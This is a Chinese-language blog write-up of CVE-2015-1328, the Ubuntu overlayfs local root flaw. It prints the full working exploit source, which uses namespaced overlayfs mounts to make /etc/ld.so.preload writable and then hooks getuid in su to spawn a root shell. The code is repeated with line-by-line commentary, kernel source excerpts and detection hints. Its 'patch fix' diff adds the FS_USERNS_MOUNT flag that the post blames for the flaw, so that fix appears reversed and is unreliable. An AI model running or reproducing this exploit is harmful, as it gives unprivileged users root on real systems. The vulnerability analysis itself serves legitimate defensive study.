CVE-2015-1328 Ubuntu 12.04, 14.04, 14.10, 15.04 overlayfs Local Root

catalog

0. 引言

1. Description

2. Effected Scope

3. Exploit Analysis

4. Principle Of Vulnerability

5. Patch Fix

 

0. 引言

新技术、高性能技术的不断发展,越来越提升了操作系统的能力,而近几年出现的虚拟化技术,包括overlayfs虚拟层叠文件系统技术,则为docker这样的虚拟化方案提供了越来越强大的技术支撑,但是也同时带来了很多的安全问题
抛开传统的overflow溢出型漏洞不说,还有另一类漏洞属于"特性型"的漏洞,黑客利用系统原生提供的"功能",加上一些特殊设计的"使用组合方式",以此实现了非预期的操作结果,甚至root
这也再次告诉我们,在系统层和黑客进行攻防,就需要比黑客更加深刻理解系统本身的特性,以及在极端条件下它们的组合方式,因为这些组合方式很有可能能够转化为攻击向量

 

1. Description

Philip Pettersson discovered a privilege escalation when using overlayfs mounts inside of user namespaces. A local user could exploit this flaw to gain administrative privileges on the system
使用默认配置的ubuntu.所有版本存在该cve-2015-1328漏洞,允许本地root特权提升,当在upper文件系统目录中创建新文件时,overlayfs文件系统并不能恰当检查文件权限
该漏洞能被某非特权进程利用,此进程在内核中(带有CONFIG_USER_NS=y、且其位置的overlayfs带有FS_USERNS_MOUNT标志),可让挂载的overlayfs在非特权的目录中挂载命名空间,
这是ubuntu12.04, 14.04, 14.10, and 15.04 [1].的默认配置

0x1: Overlay Filesystem

Relevant Link:

https://security-tracker.debian.org/tracker/CVE-2015-1328

http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html

http://www.freebuf.com/news/70615.html

http://seclists.org/oss-sec/2015/q2/717

https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt

http://www.cnblogs.com/LittleHann/p/4083943.html

//搜索:0x4: overlayfs 

 

2. Effected Scope

Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)

 

3. Exploit Analysis

CVE-2015-1328 Ubuntu 12.04, 14.04, 14.10, 15.04 overlayfs Local Root

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <sched.h>

#include <sys/stat.h>

#include <sys/types.h>

#include <sys/mount.h>

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <sched.h>

#include <sys/stat.h>

#include <sys/types.h>

#include <sys/mount.h>

#include <sys/types.h>

#include <signal.h>

#include <fcntl.h>

#include <string.h>

#include <linux/sched.h>



#define LIB 

"#include <unistd.h>"

"uid_t(*_real_getuid) (void);"

"char path[128];"

"uid_t getuid(void)"

"{"

"_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");"

"readlink(\"/proc/self/exe\", (char *) &path, 128);"

"if(geteuid() == 0 && !strcmp(path, \"/bin/su\"))"

"{\nunlink(\"/etc/ld.so.preload\");"

"unlink(\"/tmp/ofs-lib.so\");"

"setresuid(0, 0, 0);"

"setresgid(0, 0, 0);"

"execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);"

"}"

"return _real_getuid();"

"}"



static char child_stack[1024*1024];



static int child_exec(void *stuff)

{

    char *file;

    system("rm -rf /tmp/ns_sploit");

    mkdir("/tmp/ns_sploit", 0777);

    mkdir("/tmp/ns_sploit/work", 0777);

    mkdir("/tmp/ns_sploit/upper",0777);

    mkdir("/tmp/ns_sploit/o",0777);



    fprintf(stderr,"mount #1\n");

    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) 

    {

        // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower

        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) 

        {

            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");

            exit(-1);

        }

        file = ".access";

        chmod("/tmp/ns_sploit/work/work",0777);

    } 

    else 

        file = "ns_last_pid";



    chdir("/tmp/ns_sploit/o");

    rename(file,"ld.so.preload");



    chdir("/");

    umount("/tmp/ns_sploit/o");

    fprintf(stderr,"mount #2\n");

    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) 

    {

        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) 

        {

            exit(-1);

        }

        chmod("/tmp/ns_sploit/work/work",0777);

    }



    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);

    umount("/tmp/ns_sploit/o");

}



int main(int argc, char **argv)

{

    int status, fd, lib;

    pid_t wrapper, init;

    int clone_flags = CLONE_NEWNS | SIGCHLD;



    fprintf(stderr,"spawning threads\n");

    

    //创建子进程

    if((wrapper = fork()) == 0) 

    {

        //将子进程移动到新命名空间,和父进程分离

        if(unshare(CLONE_NEWUSER) != 0)

        fprintf(stderr, "failed to create new user namespace\n");



        //子进程继续创建子进程

        if((init = fork()) == 0) 

        {

            //新的子进程从新的函数入口点开始执行,相当于execve了一个新进程,新的子进程继续存在于一个新的命名空间中

            pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);

            if(pid < 0) 

            {

                fprintf(stderr, "failed to create new mount namespace\n");

                exit(-1);

            }

            waitpid(pid, &status, 0); 

        } 

        waitpid(init, &status, 0);

        return 0;

    }



    usleep(300000);



    wait(NULL);



    fprintf(stderr,"child threads done\n");



    fd = open("/etc/ld.so.preload",O_WRONLY);



    if(fd == -1) 

    {

        fprintf(stderr,"exploit failed\n");

        exit(-1);

    }



    fprintf(stderr,"/etc/ld.so.preload created\n");

    fprintf(stderr,"creating shared library\n");

    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);

    write(lib,LIB,strlen(LIB));

    close(lib);

    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");

    if(lib != 0) 

    {

        fprintf(stderr,"couldn't create dynamic library\n");

        exit(-1);

    }

    write(fd,"/tmp/ofs-lib.so\n",16);

    close(fd);

    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");

    execl("/bin/su","su",NULL);

}

Relevant Link:

http://cxsecurity.com/issue/WLB-2015060081

https://www.exploit-db.com/exploits/37292/

 

4. Principle Of Vulnerability

我们以POC中使用都的API调用和特性为线索,逐步讨论overlayfs的相关"特性",以及这些特性是如何最终形成一条攻击向量的

0x1: 创建子进程时传入CLONE_NEWNS

注意到POC中的这几行代码,涉及到了shared标志位、CLONE_NEWNS标志位

..

//创建子进程

    if((wrapper = fork()) == 0) 

    {

        //将子进程移动到新命名空间,和父进程分离

        if(unshare(CLONE_NEWUSER) != 0)

        fprintf(stderr, "failed to create new user namespace\n");



        //子进程继续创建子进程

        if((init = fork()) == 0) 

        {

            //新的子进程从新的函数入口点开始执行,相当于execve了一个新进程,新的子进程继续存在于一个新的命名空间中

            pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);

        ..

/source/kernel/fork.c

/*

 * unshare allows a process to 'unshare' part of the process

 * context which was originally shared using clone.  copy_*

 * functions used by do_fork() cannot be used here directly

 * because they modify an inactive task_struct that is being

 * constructed. Here we are modifying the current, active,

 * task_struct.

 */

SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags)

{

    int err = 0;

    struct fs_struct *fs, *new_fs = NULL;

    struct sighand_struct *new_sigh = NULL;

    struct mm_struct *mm, *new_mm = NULL, *active_mm = NULL;

    struct files_struct *fd, *new_fd = NULL;

    struct nsproxy *new_nsproxy = NULL;

    int do_sysvsem = 0;



    check_unshare_flags(&unshare_flags);



    /* Return -EINVAL for all unsupported flags */

    err = -EINVAL;

    if (unshare_flags & ~(CLONE_THREAD|CLONE_FS|CLONE_NEWNS|CLONE_SIGHAND|

                CLONE_VM|CLONE_FILES|CLONE_SYSVSEM|

                CLONE_NEWUTS|CLONE_NEWIPC|CLONE_NEWNET))

        goto bad_unshare_out;



    /*

     * CLONE_NEWIPC must also detach from the undolist: after switching

     * to a new ipc namespace, the semaphore arrays from the old

     * namespace are unreachable.

     */

    if (unshare_flags & (CLONE_NEWIPC|CLONE_SYSVSEM))

        do_sysvsem = 1;

    if ((err = unshare_thread(unshare_flags)))

        goto bad_unshare_out;

    if ((err = unshare_fs(unshare_flags, &new_fs)))

        goto bad_unshare_cleanup_thread;

    if ((err = unshare_sighand(unshare_flags, &new_sigh)))

        goto bad_unshare_cleanup_fs;

    if ((err = unshare_vm(unshare_flags, &new_mm)))

        goto bad_unshare_cleanup_sigh;

    if ((err = unshare_fd(unshare_flags, &new_fd)))

        goto bad_unshare_cleanup_vm;

    if ((err = unshare_nsproxy_namespaces(unshare_flags, &new_nsproxy,

            new_fs)))

        goto bad_unshare_cleanup_fd;



    if (new_fs ||  new_mm || new_fd || do_sysvsem || new_nsproxy) {

        if (do_sysvsem) {

            /*

             * CLONE_SYSVSEM is equivalent to sys_exit().

             */

            exit_sem(current);

        }



        if (new_nsproxy) {

            switch_task_namespaces(current, new_nsproxy);

            new_nsproxy = NULL;

        }



        task_lock(current);



        if (new_fs) {

            fs = current->fs;

            write_lock(&fs->lock);

            current->fs = new_fs;

            if (--fs->users)

                new_fs = NULL;

            else

                new_fs = fs;

            write_unlock(&fs->lock);

        }



        if (new_mm) {

            mm = current->mm;

            active_mm = current->active_mm;

            current->mm = new_mm;

            current->active_mm = new_mm;

            activate_mm(active_mm, new_mm);

            new_mm = mm;

        }



        if (new_fd) {

            fd = current->files;

            current->files = new_fd;

            new_fd = fd;

        }



        task_unlock(current);

    }



    if (new_nsproxy)

        put_nsproxy(new_nsproxy);



bad_unshare_cleanup_fd:

    if (new_fd)

        put_files_struct(new_fd);



bad_unshare_cleanup_vm:

    if (new_mm)

        mmput(new_mm);



bad_unshare_cleanup_sigh:

    if (new_sigh)

        if (atomic_dec_and_test(&new_sigh->count))

            kmem_cache_free(sighand_cachep, new_sigh);



bad_unshare_cleanup_fs:

    if (new_fs)

        free_fs_struct(new_fs);



bad_unshare_cleanup_thread:

bad_unshare_out:

    return err;

}

/source/kernel/fork.c

static struct task_struct *copy_process(unsigned long clone_flags,

                    unsigned long stack_start,

                    struct pt_regs *regs,

                    unsigned long stack_size,

                    int __user *child_tidptr,

                    struct pid *pid,

                    int trace)

{

    int retval;

    struct task_struct *p;

    int cgroup_callbacks_done = 0;



    /*

    1. 对传入的clone_flag进行检查

    */

    if ((clone_flags & (CLONE_NEWNS|CLONE_FS)) == (CLONE_NEWNS|CLONE_FS))

        return ERR_PTR(-EINVAL);

 

    if ((clone_flags & CLONE_THREAD) && !(clone_flags & CLONE_SIGHAND))

        return ERR_PTR(-EINVAL);

 

    if ((clone_flags & CLONE_SIGHAND) && !(clone_flags & CLONE_VM))

        return ERR_PTR(-EINVAL);

 

    if ((clone_flags & CLONE_PARENT) &&

                current->signal->flags & SIGNAL_UNKILLABLE)

        return ERR_PTR(-EINVAL);

    ..

    /* 

    copy all the process information 

    根据clone_flags复制父进程的资源到子进程,对于clone_flags指定共享的资源,父子进程间共享这些资源,仅仅设置子进程的相关指针,并增加资源数据结构的引用计数

    */

    if ((retval = copy_semundo(clone_flags, p)))

        goto bad_fork_cleanup_audit;

    if ((retval = copy_files(clone_flags, p)))

        goto bad_fork_cleanup_semundo;

    if ((retval = copy_fs(clone_flags, p)))

        goto bad_fork_cleanup_files;

    if ((retval = copy_sighand(clone_flags, p)))

        goto bad_fork_cleanup_fs;

    if ((retval = copy_signal(clone_flags, p)))

        goto bad_fork_cleanup_sighand;

    if ((retval = copy_mm(clone_flags, p)))

        goto bad_fork_cleanup_signal;

    //复制命名空间

    if ((retval = copy_namespaces(clone_flags, p)))

    ..

/source/kernel/nsproxy.c

/*

 * called from clone.  This now handles copy for nsproxy and all

 * namespaces therein.

 */

int copy_namespaces(unsigned long flags, struct task_struct *tsk)

{

    struct nsproxy *old_ns = tsk->nsproxy;

    struct nsproxy *new_ns;

    int err = 0;



    if (!old_ns)

        return 0;



    get_nsproxy(old_ns);



    //检查flag

    if (!(flags & (CLONE_NEWNS | CLONE_NEWUTS | CLONE_NEWIPC | CLONE_NEWPID | CLONE_NEWNET)))

        return 0;



    if (!capable(CAP_SYS_ADMIN)) {

        err = -EPERM;

        goto out;

    }



    /*

     * CLONE_NEWIPC must detach from the undolist: after switching

     * to a new ipc namespace, the semaphore arrays from the old

     * namespace are unreachable.  In clone parlance, CLONE_SYSVSEM

     * means share undolist with parent, so we must forbid using

     * it along with CLONE_NEWIPC.

     */

    if ((flags & CLONE_NEWIPC) && (flags & CLONE_SYSVSEM)) 

    {

        err = -EINVAL;

        goto out;

    }



    //创建新的namespace

    new_ns = create_new_namespaces(flags, tsk, tsk->fs);

    if (IS_ERR(new_ns)) 

    {

        err = PTR_ERR(new_ns);

        goto out;

    }



    tsk->nsproxy = new_ns;



out:

    put_nsproxy(old_ns);

    return err;

}

/source/kernel/nsproxy.c

/*

 * Create new nsproxy and all of its the associated namespaces.

 * Return the newly created nsproxy.  Do not attach this to the task,

 * leave it to the caller to do proper locking and attach it to task.

 */

static struct nsproxy *create_new_namespaces(unsigned long flags, struct task_struct *tsk, struct fs_struct *new_fs)

{

    struct nsproxy *new_nsp;

    int err;



    new_nsp = create_nsproxy();

    if (!new_nsp)

        return ERR_PTR(-ENOMEM);



    //创建新的挂载点命名空间

    new_nsp->mnt_ns = copy_mnt_ns(flags, tsk->nsproxy->mnt_ns, new_fs);

    if (IS_ERR(new_nsp->mnt_ns)) 

    {

        err = PTR_ERR(new_nsp->mnt_ns);

        goto out_ns;

    }

    ..

/source/fs/namespace.c

struct mnt_namespace *copy_mnt_ns(unsigned long flags, struct mnt_namespace *ns, struct fs_struct *new_fs)

{

    struct mnt_namespace *new_ns;



    BUG_ON(!ns);

    get_mnt_ns(ns);



    if (!(flags & CLONE_NEWNS))

        return ns;



    //复制挂载命名空间

    new_ns = dup_mnt_ns(ns, new_fs);



    put_mnt_ns(ns);

    return new_ns;

}

/source/fs/namespace.c

/*

 * Allocate a new namespace structure and populate it with contents

 * copied from the namespace of the passed in task structure.

 */

static struct mnt_namespace *dup_mnt_ns(struct mnt_namespace *mnt_ns, struct fs_struct *fs)

{

    struct mnt_namespace *new_ns;

    struct vfsmount *rootmnt = NULL, *pwdmnt = NULL;

    struct vfsmount *p, *q;



    new_ns = alloc_mnt_ns();

    if (IS_ERR(new_ns))

        return new_ns;



    down_write(&namespace_sem);

    /* First pass: copy the tree topology */

    new_ns->root = copy_tree(mnt_ns->root, mnt_ns->root->mnt_root, CL_COPY_ALL | CL_EXPIRE);

    if (!new_ns->root) 

    {

        up_write(&namespace_sem);

        kfree(new_ns);

        return ERR_PTR(-ENOMEM);

    }

    spin_lock(&vfsmount_lock);

    list_add_tail(&new_ns->list, &new_ns->root->mnt_list);

    spin_unlock(&vfsmount_lock);



    /*

     * Second pass: switch the tsk->fs->* elements and mark new vfsmounts

     * as belonging to new namespace.  We have already acquired a private

     * fs_struct, so tsk->fs->lock is not needed.

     */

    p = mnt_ns->root;

    q = new_ns->root;

    while (p) 

    {

        q->mnt_ns = new_ns;

        if (fs) 

        {

            if (p == fs->root.mnt) 

            {

                rootmnt = p;

                fs->root.mnt = mntget(q);

            }

            if (p == fs->pwd.mnt) 

            {

                pwdmnt = p;

                fs->pwd.mnt = mntget(q);

            }

        }

        p = next_mnt(p, mnt_ns->root);

        q = next_mnt(q, new_ns->root);

    }

    up_write(&namespace_sem);



    if (rootmnt)

        mntput(rootmnt);

    if (pwdmnt)

        mntput(pwdmnt);



    return new_ns;

}

因为overlayfs mount需要CAP_SYS_MOUNT能力,因此需要新建一个NEWUSER的namespace,这样就有CAP_SYS_MOUNT了(即使这样也需要overlayfs在编译的时候开启了FS_USERNS_MOUNT)

0x2: 两次overlayfs mount/unount

POC先创建了用户exploit的目录和文件

system("rm -rf /tmp/ns_sploit");

mkdir("/tmp/ns_sploit", 0777);

mkdir("/tmp/ns_sploit/work", 0777);

mkdir("/tmp/ns_sploit/upper",0777);

mkdir("/tmp/ns_sploit/o",0777);

1. 第一次mount

//将lowerdir(/proc/sys/kernel)、upperdir(/tmp/ns_sploit/upper)作为overlayfs挂载到/tmp/ns_sploit/o中

if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) 

{

    // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower

    if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) 

    //将lowerdir(l/sys/kernel/security/apparmor)、upperdir(/tmp/ns_sploit/upper)、workdir(/tmp/ns_sploit/work)作为overlayfs挂载到/tmp/ns_sploit/o中

至此,已经将/proc/sys/kernel、/sys/kernel/security/apparmor作为lowerdir,全部挂载到了/tmp/ns_sploit/o中

1. 第一次lowerdir=/proc/sys/kernel upperdir=/tmp/ns_sploit/o

2. 然后rename(file,"ld.so.preload");

3. 这时候会从lowerdir复制一份file到upperdir,然后再重命名为ld.so.preload,并且这个文件的属主是root

4. 然后umount

第一次unmount

umount("/tmp/ns_sploit/o");

2. 第二次mount

if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) 

{

        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) 

        {

第二次mount是在第一次mount的基础上进行的

1. 第一次mount已经实现了在/tmp/ns_sploit/o中创建了ld.so.preload文件

2. 第二次mount lowerdir=/tmp/ns_sploit/o upperdir=/etc

3. 然后chmod("/tmp/ns_sploit/o/ld.so.preload", 0777),因为overlayfs的底层实现是合并两个文件夹,rename本质是写文件操作,写lowerdir的时候会先复制一份到upperdir再修改

4. 这就导致把/tmp/ns_sploit/o/ld.so.preload复制到了/etc目录,并且权限为0777

5. 同时这里的另一个关键漏洞是复制过程的权限判断有问题,overlayfs检查的不是当前用户能不能写upperdir,而是检测被写的文件的属主能不能写upperdir,权限判断错误实际上是在第二次mount中被利用的,从某种程度上来说,这就导致的越权写

做完了这一步之后,黑客获取到的能力有

1. 黑客有能力读取/etc/ld.so.preload文件内容,因为overlayfs挂载的关系

2. 因为overlayfs文件读写权限检查的漏洞,导致黑客有能力可以修改/etc/ld.so.preload文件内容

3. 使用ld.so.preload ring3劫持技术

..

//打开/etc/ld.so.preload文件

fd = open("/etc/ld.so.preload",O_WRONLY);

..

//编译生成用于函数劫持的hook so

lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);

write(lib,LIB,strlen(LIB));

close(lib);

lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");

..

//修改/etc/ld.so.preload,加入hook so

write(fd,"/tmp/ofs-lib.so\n",16);

close(fd);

system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");

..

hook so

/*

劫持了getuid函数,并在hook func中执行

setresgid(0, 0, 0);

execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);

直接获取root shell会话

*/

#define LIB 

"#include <unistd.h>"

"uid_t(*_real_getuid) (void);"

"char path[128];"

"uid_t getuid(void)"

"{"

"_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");"

"readlink(\"/proc/self/exe\", (char *) &path, 128);"

"if(geteuid() == 0 && !strcmp(path, \"/bin/su\"))"

"{\nunlink(\"/etc/ld.so.preload\");"

"unlink(\"/tmp/ofs-lib.so\");"

"setresuid(0, 0, 0);"

"setresgid(0, 0, 0);"

"execle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);"

"}"

"return _real_getuid();"

"}"

对整个入侵向量进行一下梳理

1. overlayfs的挂载特性(lowerdir、upperdir)是系统本身的特性,并不能严格意义上算是漏洞

2. 黑客通过两次的mount/unmount,实际上间接获得了对/etc/ld.so.preload的访问权限

3. 问题的关键在于overlayfs对upperdir文件写的权限检查逻辑有问题,overlayfs检查的不是当前用户能不能写upperdir,而是检测被写的文件的属主能不能写upperdir,这导致了黑客可以通过修改lowerdir来实现对upperdir文件的越权写

4. overlayfs实现了类似overflow的准备工作,真正发挥作用的explicit是Linux上传统的攻击技术: LD_PRELOAD/ld.so.reload劫持技术

Relevant Link:

https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt

http://www.cnblogs.com/LittleHann/p/4083943.html

//搜索:0x4: overlayfs 

 

5. Patch Fix

0x1: 检测方案

检查/etc/ld.so.preload中是否包含有恶意内容,如果发现,则认为是可疑事件

0x2: 修复方案

diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c

@@ -816,6 +816,7 @@ static struct file_system_type ovl_fs_type = {

     .name        = "overlay",

     .mount        = ovl_mount,

     .kill_sb    = kill_anon_super,

+    .fs_flags    = FS_USERNS_MOUNT,

 };

 MODULE_ALIAS_FS("overlay");

0x3: Hotpatch方案

1. poc特征: su进程创建子进程/bin/sh,这在正常的strace su跟踪中是不应该出现的

2. 可以在进程管控中针对su创建子进程建立防御规则

Relevant Link:

https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549 

 

Copyright (c) 2015 Little5ann All rights reserved

 

你可能感兴趣的:(ubuntu 12.04)